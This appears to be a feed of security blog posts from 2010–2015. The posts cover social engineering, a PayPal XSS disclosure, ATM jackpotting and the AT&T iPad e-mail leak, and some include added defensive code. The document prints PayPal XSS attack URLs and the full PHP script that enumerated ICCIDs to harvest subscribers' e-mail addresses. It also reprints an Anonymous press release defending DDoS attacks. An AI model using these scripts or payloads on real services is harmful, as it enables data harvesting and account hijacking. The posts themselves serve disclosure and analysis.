Praetorian Prefect
http://www.praetorianprefect.com
"Information Security, a little slower...a little deeper"
Mon, 23 Mar 2015 03:40:55 +0000

Jimmy Kimmel Gets your Password
http://www.praetorianprefect.com/2015/01/jimmy-kimmel-gets-your-password/
Sun, 18 Jan 2015 02:46:20 +0000

It didn’t take a whole lot of social engineering for people to give up their passwords: ask them what the password consists of (for instance, “it’s my cat’s name and birthday”), ask the cat’s name, ask a deflecting question, then ask for the birthday.

A Superbowl Wifi Problem
http://www.praetorianprefect.com/2014/02/a-superbowl-wifi-problem/
Sun, 02 Feb 2014 05:21:00 +0000

It’s an annual puff piece: whoever is in charge of security at the Super Bowl appears on the news in front of some barrier or computer screen, talking about the number of security guards, guard dogs, or whatever else passes for some grand measure of the ‘amount’ of security being applied.

And as with Super Bowl XLVII, when two students just walked right into the game simply by acting like they belonged, a news feature on Super Bowl XLVIII shows why bragging about your security can backfire:

[image: super-bowl-security-fail]

Yup, that’s Marko’s wifi (wireless network) password in the corner of the screen on the monitor, complete with clear text password for those who don’t want to bother to break it.

Two Jokers Social Engineer their way into the Superbowl
http://www.praetorianprefect.com/2013/02/two-jokers-social-engineer-their-way-into-the-superbowl/
Sun, 10 Feb 2013 05:29:18 +0000

Sneaking in near press/employee access points without going through them, zigzagging through corridors, and at one point carrying a box so that someone would open a door for them, two jokers from Savannah State University social-engineered their way into Super Bowl XLVII, for the most part simply by looking like they belonged.

DHS incorrectly associates 84,000 web sites with child pornography
http://www.praetorianprefect.com/2011/02/dhs-incorrectly-associates-84000-web-sites-with-child-pornography/
Thu, 17 Feb 2011 03:36:01 +0000

On February 15th a joint project of the Department of Homeland Security’s Immigration and Customs Enforcement (ICE) and the Department of Justice, termed “Operation Protect Our Children”, confidently announced the seizure of ten domain names involved in the advertisement and distribution of child pornography. What they failed to mention was that they had also knocked out a popular shared domain by mistake, resulting in, according to TorrentFreak, some 84,000 web sites being taken down and redirected to a banner mentioning child pornography.

Free DNS is a service that provides free DNS hosting, subdomain, and domain hosting among other services. The most popular subdomain offered by the service, mooo.com, was accidentally caught up in the ICE sweep of domains taken down.

[image: moocom]

That left legitimate sites such as http://greyghost.mooo.com redirecting to an ICE web page with this banner, telling visitors “Advertisement, distribution, transportation, receipt, and possession of child pornography constitute federal crimes that carry penalties for first time offenders of up to 30 years in federal prison, a $250,000 fine, forfeiture and restitution”:

[image: ice_banner]

ICE is able to force this by first getting a District Court judge to sign off on a seizure warrant, and then having the domain registrars re-point the domains to their server hosting the warning banner. At 7:07 on the 12th, the following message was posted by Free DNS after realizing what happened:

[image: afraiddnsmessage]

Operation In Our Sites
ICE launched its initial endeavor in domain seizures last year under “Operation In Our Sites”, aimed at seizing the domain names of those who infringe on copyrights. Legitimate criticisms of these seizure tactics included targeting web sites that claimed (with paperwork) they were not actually infringing on copyrights, and investigations conducted by agents without adequate training or experience. For example, Ars Technica noted one definition from an affidavit provided by an ICE agent that read as follows: “A Bit torrent (referred to in short as ‘torrent’ or ‘torrent file’) is a files distribution system used for transferring files across a network of people.” The lack of technical understanding in an investigator who then provides direct input into which domains will be taken down is of concern.

Finally
Site owners in this most recent case were presented with the unenviable task of explaining to visitors that they had no affiliation with child pornography. Since these are personal web sites, blogs, and small businesses, this is material to some of the site owners.

This screw-up in a well-intentioned, but overreaching and ham-fisted, government legal action on the Internet comes at a time when legislation requesting further capabilities, such as an “Internet Kill Switch”, is being discussed. Such screw-ups, and glossing over them in reporting on the project, do not serve to strengthen ICE’s ability to be successful in future enforcement actions on what is the very serious problem of dissemination of child pornographic material on the Internet.

Colbert Explains Cyberwar
http://www.praetorianprefect.com/2010/12/colbert-explains-cyberwar/
Thu, 16 Dec 2010 03:32:15 +0000

[image: stephencolbert-150x150]

On the Colbert Report, host Stephen Colbert provided some background on “the First Great Cyberwar”, as the hacktivist collective Anonymous has dubbed it: the “Defend Assange” sub-mission of Operation Payback. Operation Payback started as a fight against anti-piracy measures, but has moved to attacking, via distributed denial of service (DDoS) attacks, web sites seen to be impeding Wikileaks in its mission to release diplomatic cables. This includes sites that have frozen donations to Wikileaks, like PayPal or Mastercard, and the web sites of law enforcement and politicians either acting against or speaking out against Wikileaks or Anonymous itself.

“America is at Cyberwar, and lolcats says ‘I can has WMD’s?’” -Stephen Colbert

His guest in explaining the problem, Omar Wasow, presented himself well. Wasow is apparently best known from appearances on the Oprah Winfrey show, where he explained aspects of the Internet.

“Time’s person of the year is Mark Zuckerberg. Sorry Julian Assange, I guess you didn’t violate enough people’s privacy.” – Stephen Colbert

I just wish it had been an actual information security expert on the show. Wasow mentioned many of the right examples (the Gawker breach from earlier this week, DDoS attacks on Georgia) but forgot to mention Colbert’s own human distributed denial of service (DDoS) on Conservapedia.

Anonymous Releases Very Unanonymous Press Release
http://www.praetorianprefect.com/2010/12/anonymous-releases-very-unanonymous-press-release/
Fri, 10 Dec 2010 06:04:07 +0000

Today, December 10th, Anonymous, an Internet gathering, released a press release which you can read below. In it, a description is provided of what Anonymous is about, what Operation Payback is, and where the media is getting it wrong. Its author also forgot to remove his name from the PDF’s metadata.

[image: anon_pressrelease2]

Document Properties
Um, Alex Tapanaris…?

[image: anon_ops_docprops]

Full Press Release Text

ANON OPS: A Press Release December 10, 2010

Who is Anonymous

In their most recent public statement, WikiLeaks is the only group of people to identify Anonymous correctly. Anonymous is not a group, but rather an Internet gathering.

Both Anonymous and the media that is covering it are aware of the perceived dissent between individuals in the gathering. This does not, however, mean that the command structure of Anonymous is failing for a simple reason: Anonymous has a very loose and decentralized command structure that operates on ideas rather than directives.

We do not believe that a similar movement exists in the world today and as such we have to learn by trial and error. We are now in the process of better communicating some core values to the individual atoms that comprise Anonymous – we also want to take this opportunity to communicate a message to the media, so that the average Internet Citizen can get to know who we are and what we represent.

Anonymous is not a group of hackers. We are average Internet Citizens ourselves and our motivation is a collective sense of being fed up with all the minor and major injustices we witness every day.

We do not want to steal your personal information or credit card numbers. We also do not seek to attack critical infrastructure of companies such as Mastercard, Visa, PayPal or Amazon. Our current goal is to raise awareness about WikiLeaks and the underhanded methods employed by the above companies to impair WikiLeaks’ ability to function.

What is Operation: Payback

As stated above, the point of Operation: Payback was never to target critical infrastructure of any of the companies or organizations affected. Rather than doing that, we focused on their corporate websites, which is to say, their online “public face”. It is a symbolic action – as blogger and academic Evgeny Morozov put it, a legitimate expression of dissent.

The background to the attacks on PayPal and the calls to attack Amazon.com

Amazon, which was until recently WikiLeaks’ DNS provider, was one of the first companies to drop support for WikiLeaks. On December 9th, BusinessInsider.com reported that Amazon.co.uk were hosting the recently leaked diplomatic cables in e-book form. (Amazon.co.uk has since ceased selling the bundle of the diplomatic cables.)

After this piece of news circulated, parts of Anonymous on Twitter asked for Amazon.com to be targeted. The attack never occurred.

While it is indeed possible that Anonymous may not have been able to take Amazon.com down in a DDoS attack, this is not the only reason the attack never occurred. After the attack was so advertised in the media, we felt that it would affect people such as consumers in a negative way and make them feel threatened by Anonymous. Simply put, attacking a major online retailer when people are buying presents for their loved ones, would be in bad taste.

The continuing attacks on PayPal are already tested and preferable: while not damaging their ability to process payments, they are successful in slowing their network down just enough for people to notice and thus, we achieve our goal of raising awareness.

Related Coverage

  • http://paulrankin.tumblr.com/post/2166282743/anonymous-has-supposedly-released-a-press-release
Paypal Sender Country XSS
http://www.praetorianprefect.com/2010/10/paypal-sender-country-xss/
Wed, 06 Oct 2010 06:18:02 +0000

A new XSS vulnerability was identified on Paypal.com earlier today, found by d3v1l and disclosed on both Security-Shell and XSSed. The problem is with the parameter sender_country in a transaction called nvpsm. NVP stands for Name-Value Pair and is PayPal’s API for merchants to use when interacting with the PayPal web site; SM is short for ‘send money’. A problem such as this can be used to capture a user’s session (essentially log in as that user) and perform privileged actions (money transfers) as that user, as well as to send a user a valid PayPal URL that then redirects them to a malicious third-party site (phishing, malware, etc.).

Attack String
The following is provided as example in the posts mentioned earlier:

https://www.paypal.com/nvpsm?amount=5.00&currency_code=USD&sender_country=">XSS PAYLOAD

Which results in:

Javascript injected into the name value pair of sender country is reflected on the resulting page.

Paypal is reflecting the supplied script in the error message they are displaying, as seen in the HTML source of the page:

Error COWException: invalid country "">XSS PAYLOAD"

Rather than display an alert box, an actual attacker would either redirect the user as shown below, or capture and send their session cookie (a piece of text the browser stores temporarily to identify a user’s logged-in session) to a third-party web site.

Redirection
https://mobile.paypal.com/nvpsm?amount=50.0&currency_code=USD&sender_country=%22%3E%22%22%3E%3E%3E%3E%3Cmeta%20http-equiv=%22Refresh%22%20content=%220;url=http://www.google.com/%22%3E%20%22%22

Session Cookie
https://www.sandbox.paypal.com/nvpsm?amount=5.00&currency_code=USD&sender_country=">

Same javascript alert, but displaying all of the user's cookies under the PayPal domain.

XSS at a High Level
While the definition is ever expanding, XSS attacks are generally considered a type of injection problem where malicious input is injected into an otherwise trusted web page causing an unexpected behavior such as sending data to or from an unknown third party web site (cross site). Because the script is being run in the context of the trusted web site, it has access to cookies such as session tokens, as well as any other user information available within the security context of that web site. XSS vulnerabilities are somewhat common in web applications and will occur unfettered wherever untrusted input is not validated by the web application or encoded before output back to the user.

PayPal
The San Jose-based company is owned by eBay and has more than 78 million customer accounts. As such, the service is used to clear many of the transactions on the popular auction site. The service allows users to send money without needing to share financial information, a key enabler for sending and receiving money from third parties on the Internet. They are in some 190 markets around the world and can work with 19 different currencies.

In 2008 roughly $60 billion dollars moved through Paypal’s systems.

PayPal does make available additional authentication protection in the form of a one-time password token, called a ‘security key’ by them (similar to the ones made popular by RSA). The token costs five dollars and is available to residents of Australia, Germany, Canada, the United Kingdom and the United States. PayPal however allows a bypass of this hard token by letting the user enter further information such as a credit card or bank account number, severely impacting its effectiveness as a security measure.

Further authentication “on the front door” of the web site (the login screen) does not prevent a user session from being hijacked after authentication as is possible in a cross site scripting attack like this one.

It is worth noting that PayPal is PCI compliant, being subject to quarterly vulnerability scans, as stated on their site.

Finally
Users have the ability to go through a process to apply for a refund from PayPal if their account is broken into, but this is not always a clean process. A site should almost never reflect (redisplay) input received from an untrusted source (“the user”), which in this case is the browser, without escaping the output. PayPal has had similar problems with cross site scripting in the past, including an incident back in March. While XSS attacks can be downplayed, a site such as PayPal that performs money transfers (for users of eBay it is basically the only way to send and receive payment) usually has to address these problems quickly. A more comprehensive approach (a shared function that encodes all output originating from untrusted input on the site) is something they could start looking towards to protect their users.
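The reflection described in “XSS at a High Level” and the shared output-encoding function suggested just above, side by side as an added example (this is not code from the post or from PayPal). The handler, the allow-list of countries and the request URL are constructed for the demo; the error-message wording is the one quoted from the page source above.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed allow-list for the demo; the real service validates against its own country table.
VALID_COUNTRIES = {"US", "GB", "DE", "CA", "AU"}


def render_error_vulnerable(sender_country: str) -> str:
    # The pattern described above: the raw parameter is interpolated into the
    # error message, so a value containing '">' closes the quoted string and
    # whatever follows is parsed by the browser as markup.
    return f'<div class="error">Error COWException: invalid country "{sender_country}"</div>'


def render_error_hardened(sender_country: str) -> str:
    # quote=True turns both " and ' into entities, so the quote breakout that
    # reflected XSS relies on is neutralised before the value reaches the page.
    safe = html.escape(sender_country, quote=True)
    return f'<div class="error">Error COWException: invalid country "{safe}"</div>'


def handle_send_money(url: str, render_error) -> str:
    """Hypothetical handler for the nvpsm transaction; only sender_country is checked here."""
    params = parse_qs(urlsplit(url).query)
    country = params.get("sender_country", [""])[0]
    if country in VALID_COUNTRIES:
        return '<div class="ok">sender country accepted</div>'
    return render_error(country)


def contains_foreign_markup(rendered: str) -> bool:
    """Crude oracle: any tag other than the template's own <div> means input became markup."""
    return re.search(r"<(?!/?div\b)[A-Za-z]", rendered) is not None


# Constructed request carrying the same kind of attribute breakout shown in the posts above.
SAMPLE_URL = ("https://www.paypal.com/nvpsm?amount=5.00&currency_code=USD"
              "&sender_country=%22%3E%3Cb%3Einjected%3C%2Fb%3E")

if __name__ == "__main__":
    for name, renderer in (("vulnerable", render_error_vulnerable),
                           ("hardened", render_error_hardened)):
        page = handle_send_money(SAMPLE_URL, renderer)
        print(f"{name}: {page}\n  input became markup: {contains_foreign_markup(page)}")
```

The point of routing every error through one renderer is that the escaping call lives in a single place: validation (the allow-list) rejects bad values, but the encoding step is what keeps a rejected value from being interpreted as HTML when it is echoed back.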

Turning an ATM into a Slot Machine
http://www.praetorianprefect.com/2010/07/turning-an-atm-into-a-slot-machine/
Wed, 28 Jul 2010 06:40:51 +0000

Security researcher Barnaby Jack, currently at IOActive but a veteran of Foundstone, eEye, and Juniper with almost ten years in the industry, has demonstrated two exploit methods for ATMs (Automated Teller Machines) in a presentation that is thus far the talk of the Black Hat 2010 conference. In a talk originally slated for last year before it was muffled by Juniper based on the concerns of “an affected ATM vendor”, Jack demonstrates what he calls jackpotting an ATM.

Here’s the ATM “jackpot” (music playing, money flying out, word ‘Jackpot’ displayed on the console):

The Attack
The attack was carried out using two custom tools Jack developed: Scrooge, an ATM firmware rootkit (malicious software that conceals itself at the level of the interface between software and hardware), and Dillinger (named for the famous bank robber), a remote ATM attack tool that keeps track of compromised machines and stores the data stolen from people who use them. The first exploit involved unlocking a panel on the ATM and inserting a USB key that overwrites the machine’s native firmware with the aforementioned rootkit, taking control of the ATM.

Research
[image: atm_open]

To perform the research, Jack acquired physical ATMs, attached a debugger to the ATM motherboard, and proceeded to reverse engineer the machine’s firmware. He then developed a replacement version (the aforementioned Scrooge software). Firmware typically refers to the small footprint of code (programs, data structures) that provides internal control of electronic devices; in other words, think of the low-level operations of any electronic device.

In the models Jack tested he was able, after accessing the machine’s USB ports with a master key purchased online, to replace the firmware with his rootkit version. The ATMs include the ability to do this so that firmware updates can be made by those performing maintenance on the ATM. However, there is no integrity check to ensure that the code update is coming from a trusted source.

The keys themselves for the cabinets are not hard to acquire.

Mitigation
In response, ATM vendors have created a new version of the firmware requiring future updates to carry a digital signature (a cryptographic check, keyed to the author of code for that machine, that lets the ATM verify the origin and integrity of the code update). Doing this would help to prevent the type of rogue update via USB that Jack performed, as long as the signing keys are kept secret.
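What the missing integrity check looks like once it is in place, as an added example (not code from the post or from any ATM vendor). The container layout, the update path and the key are all constructed for the demo, and HMAC-SHA256 stands in for the vendor’s signature scheme, which the post does not detail: the check is the same shape (verify before flashing, reject anything unsigned, tampered or older), but a real deployment would use an asymmetric signature so that the key held inside the ATM can only verify and never sign.

```python
import hashlib
import hmac
import struct

# Constructed update container (an assumption for this demo, not any vendor's format):
#   magic (4 bytes) | version (uint32, big-endian) | tag (32 bytes) | firmware image
# The tag covers magic + version + image, so the code and the version it claims
# are both authenticated; the version is what makes rollback detectable.
MAGIC = b"FWUP"
HEADER = struct.Struct(">4sI32s")


def _tag(key: bytes, version: int, image: bytes) -> bytes:
    # HMAC-SHA256 used here in place of the vendor's (unspecified) signature.
    return hmac.new(key, MAGIC + struct.pack(">I", version) + image, hashlib.sha256).digest()


def build_update(image: bytes, version: int, key: bytes) -> bytes:
    """Vendor side: package an image with its version and authentication tag."""
    return HEADER.pack(MAGIC, version, _tag(key, version, image)) + image


class Atm:
    """Minimal model of the USB update path; only the verification logic matters here."""

    def __init__(self, key: bytes, installed_version: int):
        self.key = key
        self.installed_version = installed_version
        self.firmware = None

    def apply_update(self, blob: bytes) -> str:
        if len(blob) < HEADER.size:
            return "rejected: truncated container"
        magic, version, tag = HEADER.unpack_from(blob)
        image = blob[HEADER.size:]
        if magic != MAGIC:
            return "rejected: not an update container"
        # Authenticate before trusting anything else in the header; compare_digest
        # keeps the comparison constant-time.
        if not hmac.compare_digest(tag, _tag(self.key, version, image)):
            return "rejected: authentication tag mismatch"
        # Anti-rollback: a genuine but older image must not replace a newer one.
        if version <= self.installed_version:
            return "rejected: version %d is not newer than %d" % (version, self.installed_version)
        self.firmware = image
        self.installed_version = version
        return "applied"


if __name__ == "__main__":
    vendor_key = b"constructed-demo-key"          # placeholder, not a real signing key
    atm = Atm(vendor_key, installed_version=3)
    print(atm.apply_update(build_update(b"firmware v4", 4, vendor_key)))      # applied
    print(atm.apply_update(build_update(b"rogue firmware", 5, b"other-key"))) # tag mismatch
    print(atm.apply_update(build_update(b"firmware v4", 4, vendor_key)))      # rollback refused
```

The order of the checks matters: the tag is verified before the version field is acted on, so an attacker cannot use a forged header to drive the comparison logic, and the rollback check then stops a legitimately signed but older (and possibly vulnerable) image from being reinstalled.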

Breadth
While Jack wouldn’t reveal the names of the ATM vendors whose devices he compromised (they are reported to be Triton and Tranax machines), he has noted that he has compromised every ATM he has tested, intimating that attacks on multiple machines are possible because of similarities in the way generic ATMs are made. He did note the external limitations of his research, citing the fact that there are only so many ATMs you can put in an apartment before “your girlfriend gets mad”.

Jack actually told the delivery man who brought the ATM’s that he was getting them because he wanted to avoid bank withdrawal fees.

Remote Attack
A remote attack was also demonstrated over Wifi, but many of the details have not yet been released. Jack found a way, testing on his own machines, to bypass the remote authentication system of the ATM so that the same homemade rootkit, Scrooge, could be installed. This essentially provides access to an ATM via an Internet connection, allowing for attack results such as recording card and PIN numbers on entry and sending them to a remote attacker. Such vulnerable ATMs could be located with a war dialing tool, calling thousands of phone numbers until a vulnerable machine responds via modem, a technique already in play by criminals.

“Sometimes you have to demo a threat to spark a solution,”
Barnaby Jack

The image is a resonant and powerful one of insecurity: we have here a demonstrated attack that allows you to spew money out of an ATM in a few seconds, and a second one that doesn’t even require physical access to the machine. At this point, the response timeframe from ATM vendors, as well as the vulnerability demonstrated via USB, border on negligence: a master key that is readily available and USB-based firmware updates without any signing mechanism to ensure that it is an ‘approved’ update.

We have here, after all, a device whose sole purpose is to dispense cash.

Last year an ATM vendor got the talk pulled from Black Hat by pressuring Jack’s employer, Juniper Networks, despite having seven months of notification from Jack to arrive at some sort of response before the scheduled talk. Given that we are now some one and a half years from notification, and given the quantity and dispersal of ATMs out there, the vulnerabilities demonstrated are likely still viable.

114,000 iPad Owners: The Script that Harvested Their E-mail Addresses
http://www.praetorianprefect.com/2010/06/114000-ipad-owners-the-script-that-harvested-their-e-mail-addresses/
Wed, 09 Jun 2010 07:15:04 +0000

Here is the script referenced in the Gawker story from earlier, which describes how a number of early iPad 3G subscribers, including names like Harvey Weinstein, Michael Bloomberg, Diane Sawyer, and Rahm Emanuel, had their e-mail addresses revealed via a poorly designed web application hosted by AT&T.

Goatse Security, named for the famous Internet shock image, wrote the script to harvest e-mail addresses by providing ICC-ID numbers (integrated circuit card identifier, a number that associates a SIM card with a subscriber) and parsing the returned e-mail address.

High profile users from the list of harvested e-mail addresses.

After speaking with Goatse Security member Weev, he was kind enough to share the script:


<?php
// iPad 3G Account Slurper
//
// Usage: ./ipadump.php ICCID-base count
// (The script generates the final checkdigit to produce ICCIDs from the entered base)
$useragent = "Mozilla/5.0 (iPad)"; // Spoof as iPad
$ICCIDroot = $_SERVER['argv'][1];
$ICCIDcount = $_SERVER['argv'][2];
$counter = 0; // loop counter

function genluhn($number) { // Crappy home-made Luhn checkdigit generator
    $array = array();
    $i = strlen($number) - 1;
    do { // reverse the digits so the rightmost one is processed first
        $array[] = $number[$i];
        $i--;
    } while ($i > -1);
    $i = 0;
    $total = 0;
    foreach ($array as $digit) {
        if (!($i & 1)) { // double every second digit, starting with the rightmost
            $digit = $digit * 2;
            if ($digit >= 10) {
                $digit = $digit - 9;
            }
        }
        $total += $digit;
        $i++;
    }
    $luhn = 10 - ($total % 10);
    if ($luhn == 10) $luhn = 0;
    return $luhn;
}

while (1) { // Continue FOREVER
    $ch = curl_init(); // Set up cURL
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // Since there's a lot of redirection
    curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies"); // See later
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // Returns any and all data
    $ICCID = $ICCIDroot . genluhn(strval($ICCIDroot)); // Generate checkdigit and attach it to the ICCID
    curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/openPage?ICCID=" . strval($ICCID) . "&IMEI=0");
    $output = curl_exec($ch); // Load first page with ICCID
    curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/Customer");
    $output = curl_exec($ch); // Now load page that is normally redirected with JavaScript. cURL is nice and passes the previously GET'd info
    curl_close($ch);
    //print $output; // Prints HTML result
    if (!($counter % 50)) echo "-" . strval($ICCID) . "-\n"; // Prints ICCID every 50 counts just to keep track of how far the script has gotten
    // Parse output. Terribly sloppy
    if (preg_match("/<title>Error<\/title>/", $output, $match)) {
        preg_match("/<div class=\"info-container\">(.*)<br>(.*)<br>/msU", $output, $match);
        $match[0] = preg_replace("/<div class=\"info-container\">\n\s\s /", "", $match[0]);
        $match[0] = preg_replace("/<\/b><br>/", "<\/b> <br>", $match[0]); // Because I want space between the period and the next sentence, dammit
        $errnum = strip_tags($match[0]);
        $status = "Error! " . $errnum; // Return specific error message
    } else if (preg_match("<input id=\"email\" name=\"email\" type=\"email\" placeholder=\"Required\" value=\".*\@.*\" autocapitalization=\"off\" autocorrect=\"off\">", $output, $match)) {
        $match[0] = preg_replace("/input id=\"email\" name=\"email\" type=\"email\" placeholder=\"Required\" value=\"/", "", $match[0]);
        $status = preg_replace("/\" autocapitalization=\"off\" autocorrect=\"off\"/", "", $match[0]); // Return email address
    } else {
        $status = "Inactive"; // Assume SIM is inactive if nothing tells us otherwise. Bad logic, will fix.
    }
    if ($status != "Inactive") echo strval($ICCID) . " : " . $status . "\n"; // Print ICCID with error message or email address. Can print if ICCID is inactive, but it makes for a long, redundant log.
    if ($counter == $ICCIDcount) exit;
    $ICCIDroot++; // step ICCID
    $counter++; // step loop counter
}
?>

There are probably a few things worth pointing out. They had to set the user-agent string to be the iPad as shown:

$useragent="Mozilla/5.0 (iPad)";

The vulnerable URL at att.com was:

https://dcp2.att.com/OEPClient/openPage?ICCID=Insert number here&IMEI=0

And that’s it: an e-mail address gets returned in the successful iterations (active ICCID) and parsed. There’s no complex hack, no real infiltration or bypass of an authentication mechanism, and no breach, just a really poorly designed web application that returns an e-mail address when an ICCID is passed to it.
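Two things the post leaves to the reader, as an added example (not code from the post, from Goatse Security or from AT&T): what the check-digit step the script relies on actually computes, and what the walk through consecutive ICCIDs looks like from the server side, where it is the signal a defender would alert on. The log format, the client addresses and the ICCID values below are constructed; only the request path comes from the post. The detector flags a client whose requests walk through consecutive ICCID bases, and separately counts requests whose check digit is wrong, which no real SIM would produce.

```python
import re
from collections import defaultdict


def luhn_check_digit(base: str) -> int:
    """Check digit for a digit string that does not yet carry one (the rule the script's genluhn implements)."""
    total = 0
    for i, ch in enumerate(reversed(base)):
        d = int(ch)
        if i % 2 == 0:          # the rightmost digit of the base is the first one doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return (10 - total % 10) % 10


def luhn_valid(number: str) -> bool:
    """True when the last digit is the correct Luhn check digit for the rest."""
    return number.isdigit() and len(number) > 1 and luhn_check_digit(number[:-1]) == int(number[-1])


# Constructed access-log line shape: timestamp, client address, request line, status.
LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<client>\S+) "GET /OEPClient/openPage\?ICCID=(?P<iccid>\d+)&IMEI=0" \d+$')


def analyse(lines, run_threshold: int = 5) -> dict:
    """Per client: request count, longest run of consecutive ICCID bases, bad check digits, and a flag."""
    per_client = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            per_client[m["client"]].append(m["iccid"])
    report = {}
    for client, iccids in per_client.items():
        bases = [int(i[:-1]) for i in iccids]      # strip the check digit before comparing neighbours
        longest = run = 1
        for prev, cur in zip(bases, bases[1:]):
            run = run + 1 if cur == prev + 1 else 1
            longest = max(longest, run)
        bad = sum(1 for i in iccids if not luhn_valid(i))
        report[client] = {"requests": len(iccids), "longest_sequential_run": longest,
                          "bad_check_digit": bad, "flag": longest >= run_threshold}
    return report


def _line(ts, client, iccid):
    return f'{ts} {client} "GET /OEPClient/openPage?ICCID={iccid}&IMEI=0" 200'


# Constructed sample: one client walks eight consecutive ICCIDs, then sends one with a
# wrong check digit; a second client makes a single ordinary request.
SCANNER, NORMAL = "203.0.113.9", "198.51.100.4"
_START = 89014103211118510
SAMPLE_LOG = [_line(f"2010-06-09T07:15:{s:02d}Z", SCANNER, f"{b}{luhn_check_digit(str(b))}")
              for s, b in enumerate(range(_START, _START + 8))]
_valid = f"{_START + 17}{luhn_check_digit(str(_START + 17))}"
SAMPLE_LOG.append(_line("2010-06-09T07:15:30Z", SCANNER, _valid[:-1] + str((int(_valid[-1]) + 1) % 10)))
SAMPLE_LOG.append(_line("2010-06-09T07:16:00Z", NORMAL, "79927398713"))

if __name__ == "__main__":
    for client, stats in analyse(SAMPLE_LOG).items():
        print(client, stats)
```

The deeper fix is on the application side: an identifier that is public, sequential and printed on the SIM packaging cannot serve as the sole key for returning account data, and a lookup like this needs the subscriber to be authenticated and the endpoint rate-limited. The log check above is what you run in the meantime, because a run of consecutive identifiers from one source is exactly the shape this script produces.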

Thou Shalt Not Send Naked Pictures…To Anyone Ever
http://www.praetorianprefect.com/2010/05/thou-shalt-not-send-naked-picturesto-anyone-ever/
Wed, 26 May 2010 05:39:22 +0000

[image: MandarinHigh-150x150]

It’s becoming a familiar story: an angry parent of a student reports finding inappropriate images, self-taken naked pictures and videos, on that student’s cell phone. The images and video were sent to the student by a high school football coach. The mother of the student e-mailed the pictures to the administration of the high school, and the coach was promptly fired in disgrace. But this story has an unusual wrinkle: the student is a 20-year-old at the University of Central Florida, the girlfriend of 32-year-old Mandarin High School football coach Jason Robinson.

Upon finding the pictures, the mother of Jason Robinson’s college age girlfriend fired the images off to the administration at the High School employing this coach. The administration reacted by terminating Robinson, who being within the first three years of his contract there was essentially the equivalent of an “at-will” employee.

The high school principal, Dr. Donna Richardson, fired off the following letter to the coach:

“Effective today you have been reassigned to Bulls Bay for the remainder of this school year. You are not to come back onto our campus, and we will make arrangements to get any of your personal belongings to you.

You are also being non-reappointed for the next school year. It is regretful it had to come to this, but I believe you understand the situation.”

“We hold our teachers to a higher standard. They are in front of our students. They’re talking with our students. They’re teaching our students how to become good characters”

Jason Robinson

So we are left with an ‘at will’ employee, who can be dismissed for any reason, being dismissed for showing a lack of sound judgment and a potential violation of a policy (which for whatever reason couldn’t be located in time to include in the letter). From a legal standpoint, the dismissal may be on solid enough ground.

[image: jasonrobinson]

The incident is problematic on a number of fronts though. As soon as an employing organization begins to pass judgment on the private actions of two consenting adults, actions that are neither criminal nor disallowed by policy, it takes on an inappropriate role as a moral arbiter over its teachers and staff. The mother’s actions were largely inappropriate in the absence of a crime or a high school policy violation regarding relationships between teachers and staff. There has been no indication yet that this relationship started when the girlfriend was a high school student herself. But since you can’t control parents, the high school board, a group of people, owed it to all involved to display a cooler head.

Robinson is claiming this incident has ruined his reputation, and is suing the parents of his 20-year-old girlfriend for violating his privacy by looking at the material. It certainly does affect his future prospects of working as a high school football coach to be so publicly dismissed.

A sister of the girlfriend does attend high school at Mandarin also, probably another reason this should have been handled much more quietly, as her life must be a joy right now.

One Wrinkle Though
There is one awkward little wrinkle to the whole episode which may make the school board right (but which throws into question why they wouldn’t comment further to defend their position). There is an allegation that the coach used a school computer to send the images. If that is the case, a policy prohibiting using school equipment to view or send pornography should both be in place and apply (minus the publicity and ‘shaming’ e-mail).

[image: 1274916964-richardson1-150x150]

So why isn’t that being included in the school’s response to the case? Either because it isn’t true, or because they haven’t conducted a responsible forensics investigation to back up the allegation. To fire someone so publicly without having this was a mistake. Administrative leave, strengthening the case via proper computer forensics, and then having a full story to go forward with is the correct way to go, not an e-mail sent in haste from the principal’s computer.

According to most followup commentary, the “sent from a school computer” piece likely is not true anyway.

Sexting
Sexting is basically the act of sending a sexually explicit photograph or message using a mobile phone as the communication device. The name derives from a combination (or portmanteau, for those who want to learn a new word) of the words sex and texting.

The first well known reference to the word is a 2005 article in the British Sunday Telegraph Magazine. In a survey conducted by Cosmogirl, 20% of teens and 33% of young adults indicated they had sent nude or semi-nude (big difference) pictures of themselves via electronic communications. Some 39% of teens and 59% of young adults had said they sent sexually explicit messages.

The Cosmogirl results have been thrown into question however (surveys always are); at least one sociologist, C.J. Pascoe, an assistant professor at Colorado College, completed a three-year study interviewing 80 teenagers and found no evidence of truly explicit text or photographs sent via mobile devices.

From personal experience, students are certainly sending and posting information that their parents and other adults would note is probably a mistake to preserve electronically and share. Campaigns, such as the James Lipton campaign we posted about earlier, Don’t Tweet Your Junk, are largely a reaction to this problem.

So there is an issue here that should not be ignored, one that naturally followed the increasing capabilities of cell phones, the decreasing costs, and the result that more young people than ever have sophisticated access to communications technology (something their parents did not by and large have). That said, hyping the numbers by suggesting that 2 out of every 10 teens are sending naked pictures of themselves via their phones is unnecessarily alarmist.

The other, larger problem of overreaction is overzealous prosecution of teenagers under child pornography laws which were certainly not codified to cover teenagers e-mailing photographs to each other. Further, the classification of said teenagers or young adults as sex offenders serves only to weaken the notification requirements under Megan’s Law, designed to protect youth against real sex predators.

Finally
I don’t understand the proclivity in the number of people sending naked pictures of their junk to other people. Maybe if doing so will result in Paris Hilton like publicity, but for most of us photographing our nether regions should be grounds for having our heads examined. That said, what we have here is two consenting adults sending content between each other. It was no more the high school’s business than it was that of the mother, unless a school computer was used.

One could make the loose case that the mother of a 20-year-old might have the moral authority to snoop to try to keep her daughter safe (we don’t really think so at 20, but we could see someone saying that). But sending the pictures on to the high school administration rather than handling this as a private family matter shows terrible judgment on the mother’s part. Since parents can’t be controlled, the school had to realize a story as salacious as this would spawn media coverage, and should have had their act in order before reacting. If they have nothing, no evidence that this relationship started when the girl was underage or in high school, no use of a school computer via evidence gathered in a forensically sound manner, then this school board has made a mistake.

Or as Principal Richardson defined the school’s mission: “They’re teaching our students how to become good characters”. They’re acting like characters all right, so far anyway.
